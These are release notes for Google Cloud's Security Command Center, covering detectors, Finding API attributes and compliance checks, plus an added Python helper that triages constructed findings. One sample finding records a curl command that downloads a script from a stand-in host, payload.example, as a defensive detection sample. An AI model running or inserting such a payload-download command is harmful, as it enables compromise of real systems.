  • Privilege Escalation: Anomalous Multistep Service Account Delegation for Admin Activity
  • Privilege Escalation: Anomalous Multistep Service Account Delegation for Data Access
  • Privilege Escalation: Anomalous Service Account Impersonator for Admin Activity
  • Privilege Escalation: Anomalous Service Account Impersonator for Data Access

These rules detect the unusual impersonation or delegation of a service account, as recorded in either the Admin Activity or Data Access audit logs. For more information, see Event Threat Detection rules.

December 08, 2022

The Malicious URL Observed detector of Container Threat Detection, a built-in service of Security Command Center Premium, is now generally available.

The detector checks URLs observed in arguments passed by executables against known phishing and malware URLs to determine if they are malicious.

You can see the full details of the detector's findings only if you upgrade to the refreshed findings display in the Security Command Center dashboard.

For more information, see the following pages:

Sensitive Actions Service, a built-in service of Security Command Center Premium, is now generally available.

Sensitive Actions Service detects when actions are taken in your Google Cloud organization, folders, and projects that could be damaging to your business if they were to be taken by a malicious actor.

For more information, see Sensitive Actions Service overview.

December 05, 2022

The kernelRootkit attribute was added to the Finding object of the Security Command Center API.

The kernelRootkit attribute contains information about a kernel rootkit that triggered a finding, including the following:

  • Name of the rootkit, if available.
  • Whether unexpected modifications were made to the kernel's code, read-only data memory, or certain important kernel data structures.

For more information, see the Security Command Center API documentation for the Finding object.

December 02, 2022

Event Threat Detection, a built-in service of Security Command Center, launched the Initial Access: Database Superuser Writes to User Tables rule to General Availability. This rule detects events where a Cloud SQL superuser (postgres for PostgreSQL servers or root for MySQL users) writes to non-system tables. For more information, see Event Threat Detection rules.

November 16, 2022

Event Threat Detection, a built-in service of Security Command Center Premium, has launched the Initial Access: Excessive Permission Denied Actions rule to Preview. This rule detects events where a principal repeatedly triggers permission denied errors across multiple methods and services.

For more information about Event Threat Detection findings, see Event Threat Detection rules.

November 14, 2022

The files attribute was added to the Finding object of the Security Command Center API.

The files attribute contains information about each file that triggered a finding, including the name of the file, the full path to the file, and the size of the file.

For more information, see the Security Command Center API documentation for the Finding object.

November 10, 2022

Security Command Center added the ability to export findings to a CSV file from the Google Cloud console. For more information, see Export findings to a CSV file.

November 07, 2022

Security Command Center released two new error detectors:

  • KTD blocked by admission controller
  • KTD image pull failure

These detectors report configuration errors that prevent the Container Threat Detection service from functioning properly.

Remediation guidance is provided for each finding type. For more information, see Security Command Center errors.

October 21, 2022

Event Threat Detection, a built-in service of Security Command Center, launched the following rules to general availability (GA).

  • Discovery: Can get sensitive Kubernetes object check
  • Privilege Escalation: Changes to sensitive Kubernetes RBAC objects
  • Privilege Escalation: Create Kubernetes CSR for master cert
  • Privilege Escalation: Creation of sensitive Kubernetes bindings
  • Privilege Escalation: Get Kubernetes CSR with compromised bootstrap credentials
  • Privilege Escalation: Launch of privileged Kubernetes container

These rules detect scenarios where a potentially malicious actor attempted to query or escalate privileges in Google Kubernetes Engine. For more information, see Event Threat Detection rules.

October 19, 2022

Rapid Vulnerability Detection, a built-in service of Security Command Center Premium, is now available in Preview.

Rapid Vulnerability Detection is a zero-configuration network and web application scanner that detects weak credentials, incomplete software installations, and other critical vulnerabilities that have a high likelihood of being exploited.

For more information, see Rapid Vulnerability Detection conceptual overview.

October 03, 2022

Error notifications in Security Command Center console

When Security Command Center detects configuration errors that prevent services from detecting threats or vulnerabilities, a pop-up notification appears in the Security Command Center console. The notification includes the number of configuration errors currently detected.

After you fix an error, the error notification is cleared after the next scan for that error type. For information about the scan interval for each error type, see Error detectors.

September 30, 2022

Sensitive Actions Service, a built-in service of Security Command Center Premium, is now available in Preview.

Sensitive Actions Service detects when actions are taken in your Google Cloud organization, folders, and projects that could be damaging to your business if they were to be taken by a malicious actor.

For more information, see Sensitive Actions Service overview.

Container Threat Detection, a built-in service of Security Command Center Premium, has launched a new detector, Malicious URL Observed, in Preview.

The detector checks URLs observed in arguments passed by executables against known phishing and malware URLs to determine if they are malicious.

Full details for these findings are available in the Security Command Center dashboard only if you upgrade to the refreshed findings display.

For more information, see:

September 28, 2022

The parentDisplayName attribute was added to the Finding object of the Security Command Center API.

The parentDisplayName attribute provides the display name of the Security Command Center service or source that produced a finding.

For more information, see the Security Command Center API documentation for the Finding object.

September 02, 2022

Event Threat Detection, a built-in service of Security Command Center, launched the Exfiltration: Cloud SQL Over-Privileged Grant rule to General Availability. This rule detects events where a Cloud SQL for PostgreSQL user or role was granted all privileges to a database, or to all tables, procedures, or functions in a schema. For more information, see Event Threat Detection rules.

August 22, 2022

The following attributes were added to the Finding object of the Security Command Center API:

  • database provides information about access to a database that is related to a finding.
  • serviceAccountKeyName, serviceAccountDelegationInfo, and principalSubject attributes were added to the existing access attribute. These new attributes provide additional context about the principals that are associated with a finding.
  • uris, a new attribute within the indicator attribute, lists any malicious URIs that are associated with a finding.

For more information, see the Security Command Center API documentation for the Finding object.

August 08, 2022

Event Threat Detection, a built-in service of Security Command Center, launched the following rules to Preview.

  • Discovery: Can get sensitive Kubernetes object check
  • Privilege Escalation: Changes to sensitive Kubernetes RBAC objects
  • Privilege Escalation: Create Kubernetes CSR for master cert
  • Privilege Escalation: Creation of sensitive Kubernetes bindings
  • Privilege Escalation: Get Kubernetes CSR with compromised bootstrap credentials
  • Privilege Escalation: Launch of privileged Kubernetes container

These rules detect scenarios where a malicious actor attempted to query for or escalate privileges in Google Kubernetes Engine. For more information, see Event Threat Detection rules.

July 21, 2022

The container and kubernetes attributes were added to the Finding object.

The container attribute provides information about both Kubernetes and non-Kubernetes containers that are associated with a given finding. The kubernetes attribute provides information about Kubernetes resources that are associated with a given finding.

For more information, see the Security Command Center API documentation for the Finding object.

July 18, 2022

Virtual Machine Threat Detection, a built-in service of Security Command Center Premium, is generally available (GA). VM Threat Detection detects cryptocurrency mining software, which is among the most common types of software installed in compromised cloud environments.

June 30, 2022

The contacts and indicator.signatures attributes were added to the Finding object.

  • The contacts attribute is a map containing the contacts for the given finding. The key represents the type of contact, and the value contains a list of all contacts of that type.
  • The indicator.signatures[] attribute lists matched signatures that indicate that a given process is present in the environment.

For more information, see the API documentation for the Finding object.

May 27, 2022

The compliances, exfiltration, and processes attributes were added to the Finding object.

  • The compliances attribute provides details about security standards that are unmet.
  • The exfiltration attribute provides details about the sources and targets of an exfiltration attempt.
  • The processes attribute provides details about operating system processes relevant to a finding.

For more information, see the API documentation for the Finding object.

May 16, 2022

Updates were made to the applications that let you send Security Command Center data to the following SIEM and SOAR platforms:

In addition, Security Command Center can automatically send findings, assets, audit logs, and security sources to Splunk. For more information, see Sending Security Command Center data to Splunk.

April 28, 2022

Security Command Center error detectors are generally available (GA). Error detectors report configuration errors that prevent Security Command Center and its services from functioning properly. Remediation guidance is provided for each finding type. For more information, see Security Command Center errors.

The connections[] and description attributes were added to the Finding object.

  • The connections[] attribute contains information about the IP connection associated with the finding. It includes the destination IP address, the destination port, the source IP address, the source port, and the protocol.
  • The description attribute provides an explanation of the finding.

For more information, see the API documentation for the Finding object.

April 07, 2022

The iamBindings[] and nextSteps attributes were added to the Finding object.

  • The iamBindings[] attribute provides a list of IAM bindings associated with the finding.
  • The nextSteps attribute provides recommended actions you can take to address the finding.

For more information, see the API documentation for the Finding object.

March 29, 2022

A revamp of the Findings workflow is in Preview. This Preview includes improvements in the filtering and querying experience. For a complete summary of improvements, see Summary: Findings Workflow Improvements. To opt in to this Preview, see Upgrade to the Findings Workflow Improvements.

March 07, 2022

To support a rich query experience on complex array elements, the contains() filter function was introduced. You can use this function in your finding queries to do the following:

  • Exact element matching: Match array elements that contain the exact string, "example".
  • Specific number operations: Match array elements that are greater than or equal to 100.
  • Complex filtering against array structures: Match array elements that contain property x with a corresponding value y.

For more information, see Filtering on array-type fields.

March 02, 2022

You can now configure automatic exports of Security Command Center findings to a BigQuery dataset. For more information, see Export findings to BigQuery for analysis.

The vulnerability.cve.upstreamFixAvailable attribute was added to the Finding object. This is a boolean field that specifies whether a Common Vulnerabilities and Exposures (CVE) fix is available. For more information, see the API documentation for the Finding object.

February 24, 2022

Security Command Center can automatically send findings, assets, and security sources to the following SIEM and SOAR platforms:

February 22, 2022

MITRE ATT&CK framework details related to findings are now available as finding attributes for all Security Command Center services. The framework explains tactics and techniques for attacks against cloud resources, and provides remediation guidance. Although these attributes are available across all built-in and integrated services, only Container Threat Detection and Event Threat Detection are populating them at this time. For more information, see the API documentation for the Finding object.

February 10, 2022

Access-related details are now available as finding attributes for all Security Command Center services. These attributes relate to an access event associated with a finding. They contain details such as the caller's IP address, which service and method was called, and what region the access event occurred in. Although access-related attributes are available across all built-in and integrated services, they're only populated by Event Threat Detection at this time. For more information, see the API documentation for the Finding object.

February 07, 2022

Previously, the following Event Threat Detection rules were made temporarily unavailable because they were generating extraneous findings:

  • Persistence: New API Method
  • Persistence: New Geography

The underlying issue has been resolved. These rules are now operational. For more information, see Event Threat Detection rules.

Security Health Analytics, a built-in service of Security Command Center, released the OPEN_GROUP_IAM_MEMBER detector to General Availability.

February 02, 2022

Event Threat Detection, a built-in service of Security Command Center, launched the Exfiltration: BigQuery Data to Google Drive rule to Preview. This rule detects events where the protected organization's BigQuery data is saved, through extraction operations, to a Google Drive folder. For more information, see Event Threat Detection rules.

January 31, 2022

Virtual Machine Threat Detection, a built-in service of Security Command Center Premium, is in Preview. During the Preview, VM Threat Detection detects cryptocurrency mining software, which is among the most common types of software installed in compromised cloud environments.

For more information, see Virtual Machine Threat Detection conceptual overview.

Web Security Scanner, a built-in service of Security Command Center, released the CACHEABLE_PASSWORD_INPUT and SESSION_ID_LEAK finding types.

For more information, see Web Security Scanner findings.

Web Security Scanner, a built-in service of Security Command Center, provides detectors for the OWASP Top 10 2017 and OWASP Top 10 2021. For more information, see Detectors and Compliance.

January 26, 2022

Security Command Center supports CIS Google Cloud Computing Foundations Benchmark v1.2.0 (CIS Google Cloud Foundation 1.2.0).

The following detectors have been added:

  • BIGQUERY_TABLE_CMEK_DISABLED
  • CONFIDENTIAL_COMPUTING_DISABLED
  • DNS_LOGGING_DISABLED
  • SQL_EXTERNAL_SCRIPTS_ENABLED
  • SQL_LOG_DURATION_DISABLED
  • SQL_LOG_ERROR_VERBOSITY
  • SQL_LOG_EXECUTOR_STATS_ENABLED
  • SQL_LOG_HOSTNAME_ENABLED
  • SQL_LOG_MIN_ERROR_STATEMENT_SEVERITY
  • SQL_LOG_MIN_MESSAGES
  • SQL_LOG_PARSER_STATS_ENABLED
  • SQL_LOG_PLANNER_STATS_ENABLED
  • SQL_LOG_STATEMENT
  • SQL_LOG_STATEMENT_STATS_ENABLED
  • SQL_REMOTE_ACCESS_ENABLED
  • SQL_SKIP_SHOW_DATABASE_DISABLED
  • SQL_TRACE_FLAG_3625
  • SQL_USER_CONNECTIONS_CONFIGURED
  • SQL_USER_OPTIONS_CONFIGURED

For more information, see Detectors and compliance.

January 24, 2022

Web Security Scanner, a built-in service of Security Command Center, released the SQL_INJECTION and STRUTS_INSECURE_DESERIALIZATION finding types.

For more information, see Web Security Scanner findings.

January 10, 2022

Web Security Scanner, a built-in service of Security Command Center, released the INSECURE_ALLOW_ORIGIN_ENDS_WITH_VALIDATION, INSECURE_ALLOW_ORIGIN_STARTS_WITH_VALIDATION, and XXE_REFLECTED_FILE_LEAKAGE finding types.

For more information, see Web Security Scanner findings.

December 30, 2021

Security Health Analytics, a built-in service of Security Command Center, launched the DATAPROC_IMAGE_OUTDATED detector to General Availability. This detector finds clusters created with Dataproc image versions that are affected by security vulnerabilities in the Apache Log4j 2 utility (CVE-2021-44228 and CVE-2021-45046). For more information, see Dataproc vulnerability findings.

December 21, 2021

Event Threat Detection, a built-in service of Security Command Center, launched the Active Scan: Log4j Vulnerable to RCE rule to General Availability. This rule detects active Log4j vulnerabilities by identifying DNS queries for unobfuscated domains that were initiated by supported Log4j vulnerability scanners. For more information, see Event Threat Detection rules.

December 16, 2021

Event Threat Detection, a built-in service of Security Command Center, launched the Initial Access: Log4j Compromise Attempt rule to General Availability. This rule detects Java Naming and Directory Interface (JNDI) lookups within headers or URL parameters. These lookups may indicate attempts at Log4Shell exploitation. For more information, see Event Threat Detection rules.

December 13, 2021

Event Threat Detection, a built-in service of Security Command Center, launched the Persistence: New API Method rule to Preview. This rule detects anomalous API behavior by examining Cloud Audit Logs for requests to Google Cloud services that a principal has not seen before. For more information, see Event Threat Detection rules.

December 10, 2021

Event Threat Detection, a built-in service of Security Command Center, launched the Evasion: Access from Anonymizing Proxy rule to General Availability. This rule detects Google Cloud service modifications that originated from anonymous proxy IP addresses, like Tor IP addresses. For more information, see Event Threat Detection rules.

December 07, 2021

To facilitate the flow of information between Security Command Center and third-party systems, a resource called ExternalSystems was added under the Finding object. A finding can contain multiple ExternalSystems fields.

The ExternalSystems resource can contain any of the following:

  • Third-party SIEM/SOAR fields within Security Command Center
  • External system information
  • External system finding fields

A caller with the Security Center External Systems Editor (roles/securitycenter.externalSystemsEditor) IAM role can update an ExternalSystems object using the organizations.sources.findings.externalSystems.patch API.

Event Threat Detection, a built-in service of Security Command Center, released the Exfiltration: BigQuery Data Extraction rule. This rule is available in Preview. It detects events where an organization's BigQuery data is exported to an externally visible Cloud Storage bucket. For more information, see Event Threat Detection rules.

November 19, 2021

Security Command Center has launched Mute Findings in general availability.

Mute Findings is a powerful volume management feature that lets you create filters to automatically hide or suppress current and future findings based on criteria you specify. The feature can save you time from reviewing or responding to security findings for assets that are isolated, fall within acceptable business parameters, or aren't relevant to your organization based on your company's policies.

To learn more, see Mute findings in Security Command Center.

November 17, 2021

Web Security Scanner, a built-in service of Security Command Center, released the SERVER_SIDE_REQUEST_FORGERY finding type in general availability.

For more information, see Remediating Web Security Scanner findings.

October 26, 2021

An issue that resulted in Security Command Center incorrectly reporting findings for some monitoring vulnerability detectors has been fixed.

Due to changes made on September 20, 2020 in the logging source upon which FIREWALL_NOT_MONITORED, NETWORK_NOT_MONITORED, ROUTE_NOT_MONITORED, and SQL_INSTANCE_NOT_MONITORED findings in Security Health Analytics are predicated, the remediation instructions for those findings were inaccurate.

The issue is resolved. Findings are being generated accurately and you are being properly alerted of misconfigurations in your organization.

If you want to enable monitoring in order to remediate these findings, you will need to update the logs-based metrics for these findings. Updated filters are available in the findings themselves and product documentation:

If you have questions or need assistance, contact Google Cloud Support or Google Cloud Billing Support.

October 25, 2021

The following detectors for unsafe Google Groups changes are generally available (GA):

  • Credential Access: Privileged Group Opened To Public
  • Credential Access: Sensitive Role Granted To Hybrid Group
  • Credential Access: External Member Added To Privileged Group

For more information, see Unsafe Google Groups changes.

October 13, 2021

Event Threat Detection, a built-in service of Security Command Center Premium, launched an integration with Chronicle that lets you perform advanced analysis of threat findings.

The integration lets you seamlessly send findings to Chronicle, a Google Cloud service that you can use to investigate threats and pivot through related actions and events in a unified timeline. Chronicle enriches Event Threat Detection findings, helping you identify indicators of interest and simplify investigations.

To learn more about Chronicle, see Chronicle overview. For instructions on sending Event Threat Detection findings to Chronicle, see Investigate findings in Chronicle.

October 05, 2021

Security Health Analytics, a built-in service of Security Command Center, released new detectors in general availability.

The following detectors, available only in Security Command Center's Premium tier, detect vulnerabilities in your Google Kubernetes Engine clusters and expand the number of detectors that support the CIS Google Kubernetes Engine (GKE) Benchmark v1.0.0:

For more information, see Container vulnerability findings. To learn how to remediate vulnerabilities, see Remediating Security Health Analytics findings.

September 14, 2021

Event Threat Detection, a built-in service of Security Command Center Premium, has launched new detectors in public preview.

The following detectors monitor your Google Workspace and Cloud Audit logs and alert you when external members are added to privileged Google Groups—groups that are granted sensitive IAM roles and permissions:

  • Credential Access: Privileged Group Joinability Risk: Detects when Google Groups are changed to be accessible to the general public
  • Persistence: IAM Anomalous Group Grant: Detects when sensitive roles are granted to privileged Google Groups with external members
  • Credential Access: External Member In Privileged Group: Detects when an external member is added to a privileged Google Group

The following detectors monitor your Admin Activity logs and alert you to suspicious changes in Compute Engine instances:

  • Persistence: Compute Engine Admin Added SSH Key: Detects modification of the Compute Engine instance metadata ssh key value on established instances
  • Persistence: Compute Engine Admin Added Startup Script: Detects modification of the Compute Engine instance metadata startup script value on established instances

The Persistence: IAM Anomalous Grant detector is enhanced and detects when sensitive roles are granted to users and service accounts.

For more information on Event Threat Detection findings, see Rules. To learn how Event Threat Detection monitors changes in Google Groups and defines sensitive roles, see Unsafe Google Group changes.

September 07, 2021

VM Manager vulnerability reports, which are in preview, are now available in Security Command Center Premium. The reports identify vulnerabilities in operating systems installed on Compute Engine virtual machines, including Common Vulnerabilities and Exposures (CVEs).

For more information on integrating VM Manager with Security Command Center, see VM Manager.

August 11, 2021

Event Threat Detection, a built-in service of Security Command Center Premium, has launched new detectors to protect your Google Workspace domains in general availability. The detectors identify suspicious activities in member accounts and your Admin Console, including leaked passwords, attempted account breaches, settings changes, and possible government-backed attacks. For more information, see Event Threat Detection overview.

Container Threat Detection, a built-in service of Security Command Center Premium, has launched a new detector, Malicious Script Executed, in general availability. The detector uses natural language processing to evaluate bash scripts and determine if they are malicious. For more information, see Container Threat Detection overview.

Security Command Center findings now include two new attributes that provide additional information about the type of finding and the activity that triggered it. The attributes include the following:

  • Indicator: displayed as indicator. This is an indicator of compromise (IoC), or artifact, observed on a network or in an operating system that, with high confidence, indicates a computer intrusion.
  • Finding Class: displayed as findingClass. Indicates the type of finding. The following list includes finding classes and their descriptions:
    • Threat: unwanted or malicious activity
    • Vulnerability: a potential weakness in software that increases risk to the confidentiality, integrity, and availability of your resources
    • Misconfiguration: a potential weakness in a resource's configuration that increases risk
    • Observation: a security observation provided for informational purposes

To learn more about findings, see the Findings tab in Using the Security Command Center dashboard.
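As an added example (not Google's code), a small triage helper over findings in the v1 API's JSON form that pulls out several of the attributes described in these release notes (findingClass, indicator.uris, access, connections[], iamBindings[], processes, files, externalSystems, nextSteps) and flags unmuted THREAT findings for incident response. The two findings it parses are constructed, and the internal-address ranges and sensitive-role prefixes are assumptions made for the example.

```python
"""Triage helper for Security Command Center Finding objects (added example).
Reads findings in the v1 API's JSON form (a Pub/Sub notification or BigQuery
export row) and flattens the attributes this release history describes. Both
sample findings are constructed; their IPs, principals and URLs are not real."""
import ipaddress
import json
from typing import Any

# Internal ranges: RFC 1918, loopback, link-local, IPv6 ULA. RFC 5737
# documentation space is left out so the constructed 203.0.113.x
# destination below counts as external egress.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "fc00::/7", "::1/128")]
# Roles whose grant deserves review (an assumption made for this example).
SENSITIVE_ROLE_PREFIXES = ("roles/owner", "roles/editor", "roles/iam.")

# Constructed sample 1: a Container Threat Detection style THREAT finding.
# int64 fields such as pid and size arrive as JSON strings (proto3 JSON).
CONTAINER_THREAT = {
    "category": "Malicious URL Observed", "findingClass": "THREAT", "mute": "UNMUTED",
    "parentDisplayName": "Container Threat Detection",
    "indicator": {"uris": ["http://payload.example/drop.sh"]},
    "connections": [
        {"destinationIp": "203.0.113.7", "destinationPort": 443,
         "sourceIp": "10.8.0.5", "sourcePort": 51234, "protocol": "TCP"},
        {"destinationIp": "10.8.0.9", "destinationPort": 8080,
         "sourceIp": "10.8.0.5", "sourcePort": 51235, "protocol": "TCP"}],
    "processes": [{"name": "curl", "binary": {"path": "/usr/bin/curl"},
                   "args": ["curl", "-o", "/tmp/drop.sh",
                            "http://payload.example/drop.sh"],
                   "pid": "4242", "parentPid": "1"}],
    "files": [{"path": "/tmp/drop.sh", "size": "8192"}],
    "externalSystems": {"jira": {"externalUid": "SEC-42", "status": "open"}},
    "nextSteps": "Quarantine the container and block the URL.",
}
# Constructed sample 2: an Event Threat Detection style IAM grant finding
# that a mute rule has already suppressed.
IAM_GRANT_THREAT = {
    "category": "Persistence: IAM Anomalous Grant", "findingClass": "THREAT", "mute": "MUTED",
    "parentDisplayName": "Event Threat Detection",
    "access": {"principalEmail": "admin@example.com", "callerIp": "198.51.100.23",
               "serviceName": "cloudresourcemanager.googleapis.com",
               "methodName": "SetIamPolicy"},
    "iamBindings": [
        {"action": "ADD", "role": "roles/owner", "member": "user:outsider@example.net"},
        {"action": "ADD", "role": "roles/viewer", "member": "user:auditor@example.com"}],
}
SAMPLE_EXPORT = "\n".join(json.dumps(f) for f in (CONTAINER_THREAT, IAM_GRANT_THREAT))

def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

def external_destinations(finding: dict[str, Any]) -> list[str]:
    """connections[] entries whose destination lies outside internal ranges."""
    return [f"{c['destinationIp']}:{c.get('destinationPort')}/{c.get('protocol')}"
            for c in finding.get("connections", [])
            if "destinationIp" in c and not is_internal(c["destinationIp"])]

def sensitive_grants(finding: dict[str, Any]) -> list[tuple[str, str]]:
    """iamBindings[] ADD actions that grant a sensitive role."""
    return [(b["role"], b["member"]) for b in finding.get("iamBindings", [])
            if b.get("action") == "ADD"
            and b.get("role", "").startswith(SENSITIVE_ROLE_PREFIXES)]

def command_lines(finding: dict[str, Any]) -> list[str]:
    """processes[] rendered as command lines, falling back to the binary name."""
    return [" ".join(p.get("args") or [p.get("name", "?")])
            for p in finding.get("processes", [])]

def triage(finding: dict[str, Any]) -> dict[str, Any]:
    """Flatten what an analyst wants first. An unmuted THREAT is flagged for
    incident response; a muted one was suppressed by policy and is not."""
    access = finding.get("access", {})
    return {
        "category": finding.get("category"),
        "finding_class": finding.get("findingClass"),
        "source": finding.get("parentDisplayName"),
        "principal": access.get("principalEmail"),
        "caller_ip": access.get("callerIp"),
        "method": access.get("methodName"),
        "malicious_uris": finding.get("indicator", {}).get("uris", []),
        "external_destinations": external_destinations(finding),
        "command_lines": command_lines(finding),
        "file_paths": [f.get("path") for f in finding.get("files", [])],
        "sensitive_grants": sensitive_grants(finding),
        "tracked_in": sorted(finding.get("externalSystems", {})),
        "next_steps": finding.get("nextSteps"),
        "needs_ir": (finding.get("findingClass") == "THREAT"
                     and finding.get("mute") != "MUTED"),
    }

def triage_export(jsonl: str) -> list[dict[str, Any]]:
    """Triage every finding in a newline-delimited JSON export."""
    return [triage(json.loads(line)) for line in jsonl.splitlines() if line.strip()]
```

Running `triage_export(SAMPLE_EXPORT)` yields one summary per finding; only the container finding is marked `needs_ir`, because the IAM grant finding is muted.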

Documentation

  • Security Command Center documentation now includes a page that maps resource type formats between Cloud Asset Inventory and Security Command Center. The services use different naming conventions for resource types. For more information, see Resource type formats in Security Command Center.

July 19, 2021

Security Health Analytics, a built-in service of Security Command Center, has launched a new detector, DATASET_CMEK_DISABLED, in general availability. The detector, available to Security Command Center Premium customers, detects BigQuery datasets that are not encrypted using customer-managed encryption keys (CMEK). For more information, see the DATASET_SCANNER table in Vulnerabilities findings.

Event Threat Detection, a built-in service of Security Command Center Premium, has launched a public preview of new detectors to protect your Google Workspace domains. The detectors identify suspicious activities in member accounts and your Admin Console, including leaked passwords, attempted account breaches, settings changes, and possible government-backed attacks. For more information, see Event Threat Detection overview.

June 07, 2021

Security Command Center Legacy, previously known as Cloud Security Command Center, and Event Threat Detection Legacy have been permanently disabled.

To continue benefiting from Security Command Center, you must migrate your organizations to Security Command Center's free Standard tier or Premium tier. Event Threat Detection, a built-in service of Security Command Center, is available only in the Premium tier.

For information on upgrading to Security Command Center Standard or Premium, see Migrate from legacy Security Command Center products. To inquire about flexible pricing options for the Premium tier, complete our Premium inquiry form. You should receive a response within two US business days.

May 24, 2021

Security Command Center Premium has launched project- and folder-level roles in general availability. The feature lets you grant users Identity and Access Management (IAM) roles for specific folders and projects. You have more granular control over who can access what resources throughout your organization. For more information, see Access control.

You must be a Security Command Center Premium customer to use this feature. Security Command Center Standard continues to support granting roles only at the organization level. To subscribe to Security Command Center Premium, contact your sales representative or fill out our inquiry form.

Security Command Center now supports two versions of CIS Benchmarks for Google Cloud Platform Foundation:

  • CIS Google Cloud Computing Foundations Benchmark v1.1.0 (CIS Google Cloud Foundation 1.1)
  • CIS Google Cloud Computing Foundations Benchmark v1.0.0 (CIS Google Cloud Foundation 1.0)

For more information about supported compliance standards, see Detectors and compliance.

Security Health Analytics, a built-in service of Security Command Center, has expanded the number of detectors in the Standard tier. The Standard tier, which is free of charge, now includes the following detectors:

  • LEGACY_AUTHORIZATION_ENABLED: Legacy Authorization is enabled on Google Kubernetes Engine (GKE) clusters.
  • OPEN_CISCOSECURE_WEBSM_PORT: A firewall is configured to have an open CISCOSECURE_WEBSM port that allows generic access.
  • OPEN_DIRECTORY_SERVICES_PORT: A firewall is configured to have an open DIRECTORY_SERVICES port that allows generic access.
  • OPEN_TELNET_PORT: A firewall is configured to have an open TELNET port that allows generic access.
  • PUBLIC_COMPUTE_IMAGE: A Compute Engine image is publicly accessible.

For a complete list of detectors in the Standard tier, see Pricing. For detailed information about all Security Health Analytics detectors, see Vulnerabilities findings.

May 05, 2021

Security Command Center Premium has launched Continuous Exports for Pub/Sub in general availability. The feature simplifies the process of creating a NotificationConfig and automates the export of new findings to Pub/Sub.

You must be a Security Command Center Premium customer to use the feature. Security Command Center Standard continues to support one-time exports. To subscribe to Security Command Center Premium, contact your sales representative or fill out our inquiry form.

Security Health Analytics, a built-in service of Security Command Center, has launched a new detector, PUBSUB_CMEK_DISABLED, in general availability. The detector, available to Security Command Center Premium customers, identifies Pub/Sub topics that are not encrypted with customer-managed encryption keys (CMEK). For more information, see the PUBSUB_SCANNER table in Vulnerabilities findings.

Event Threat Detection, a built-in service of Security Command Center, has launched a new detector in general availability. Discovery: Service Account Self-Investigation detects when a service account credential is used to investigate the roles associated with that same service account. For more information on detectors, see Event Threat Detection conceptual overview.

April 07, 2021

Security Command Center Legacy, previously known as Cloud Security Command Center, and Event Threat Detection Legacy are being permanently disabled for all customers on June 7, 2021.

If you onboarded to Security Command Center before May 2020, or Event Threat Detection before June 2020, and never upgraded to Security Command Center's Standard tier or Premium tier, you are using a legacy product.

To continue benefiting from Security Command Center and Event Threat Detection without an interruption in service, customers using legacy products must migrate their organizations to Security Command Center Standard or Premium. Event Threat Detection, a built-in service of Security Command Center, is available only in the Premium tier.

For details on upgrading legacy products, see Migrate from legacy Security Command Center products.

March 08, 2021

Security Health Analytics, a built-in service of Security Command Center, launched new detectors in general availability:

Detects resources that are not using customer-managed encryption keys (CMEK)

  • BUCKET_CMEK_DISABLED
  • DISK_CMEK_DISABLED
  • NODEPOOL_BOOT_CMEK_DISABLED
  • SQL_CMEK_DISABLED

Detects vulnerabilities in Compute Engine instances

  • DEFAULT_SERVICE_ACCOUNT_USED
  • SHIELDED_VM_DISABLED

Detects publicly accessible Cloud KMS keys

  • KMS_PUBLIC_KEY

Detects out-of-region Compute Engine resources

  • ORG_POLICY_LOCATION_RESTRICTION

Detects misconfiguration of SQL instances

  • SQL_CROSS_DB_OWNERSHIP_CHAINING
  • SQL_CONTAINED_DATABASE_AUTHENTICATION
  • SQL_LOCAL_INFILE
  • SQL_LOG_CHECKPOINTS_DISABLED
  • SQL_LOG_CONNECTIONS_DISABLED
  • SQL_LOG_DISCONNECTIONS_DISABLED
  • SQL_LOG_LOCK_WAITS_DISABLED
  • SQL_LOG_MIN_DURATION_STATEMENT_ENABLED
  • SQL_LOG_MIN_ERROR_STATEMENT
  • SQL_LOG_TEMP_FILES

For more information on these and other Security Health Analytics detectors, see Vulnerabilities findings.

Event Threat Detection, a built-in service of Security Command Center, launched a preview for a new detector.

Service account self-investigation detects when a service account is used to investigate roles associated with that same service account. For more information on Event Threat Detection detectors, see Event Threat Detection conceptual overview.

Documentation

  • Security Health Analytics documentation now includes more detailed information about detectors, including supported assets and scan configurations. For more information, see Vulnerabilities findings.

  • The Security Health Analytics remediation page now includes suggested instructions to resolve all Security Health Analytics findings. For more information, see Remediating Security Health Analytics findings.

  • Event Threat Detection documentation now includes additional details on cloud logs used by the service. For more information, see Event Threat Detection conceptual overview.

February 05, 2021

Security Command Center's v1 API now includes a Severity field for Findings.

The Severity field indicates the severity of a finding, as determined by the finding provider, and is included with all findings. The field is managed by finding providers and you are cautioned to not modify its values.

Uses for the field include listing findings of a certain severity level or grouping findings by severity level.

Read Using the Security Command Center dashboard to learn more about findings and finding severity.

Event Threat Detection, a built-in service of Security Command Center Premium, has launched previews for two new detectors.

IAM: Anomalous IP geolocation and IAM: Anomalous user agent detect anomalous connections to Google Cloud resources based on location and user agent, respectively.

Read more about available detectors in Event Threat Detection conceptual overview.

December 01, 2020

Container Threat Detection, a built-in service of Security Command Center Premium, is now in general availability. Read these notes to learn about updates, usability improvements, and new features. See our blog post, Monitor and secure your containers with new Container Threat Detection, to learn more.

Container Threat Detection now supports Google Kubernetes Engine (GKE) versions on the Stable channel. There are currently no plans to add support for GKE version 1.14.

Activation latency for newly created clusters has been improved.

A bug that blocked some information from appearing in the process section of Added Library Loaded findings is fixed.

A bug that blocked the proper display of the resource name for regional clusters in Added Library Loaded findings is fixed.

Container Threat Detection documentation includes updated information about compatibility with GKE and Virtual Private Cloud.

Read Using Container Threat Detection for more information.

October 08, 2020

Event Threat Detection, a built-in service of Security Command Center Premium, now includes two new detectors to monitor your organization's BigQuery resources. The detectors identify data exfiltration: resources saved outside of your organization, or attempts to access protected data.

Read more about available detectors in Event Threat Detection conceptual overview.

The Security Command Center API now includes a severity field for Findings. This feature is available using Security Command Center's v1p1beta1 API.

September 08, 2020

Security Command Center Premium is now in general availability (Container Threat Detection remains in beta). Read these notes to learn about updates, usability improvements, and new features.

Improved Summary Dashboard

  • A new set of interactive charts and tables provide a high-level overview of all threats and vulnerabilities.
  • An updated time selector lets you choose preset and customizable time ranges for reviewing findings and creating reports.
  • New page headers provide users with more page-specific context.

Learn more about Using the Security Command Center dashboard.

Onboarding and configuration upgrades

  • A streamlined interface lets you manage organization-wide service enablement settings.
  • A dedicated settings page for integrated services has been added to the configuration interface.

Learn more about Setting up Security Command Center.

Security Health Analytics now supports real-time detections, with some exceptions. Read more about Security Health Analytics detectors and findings.

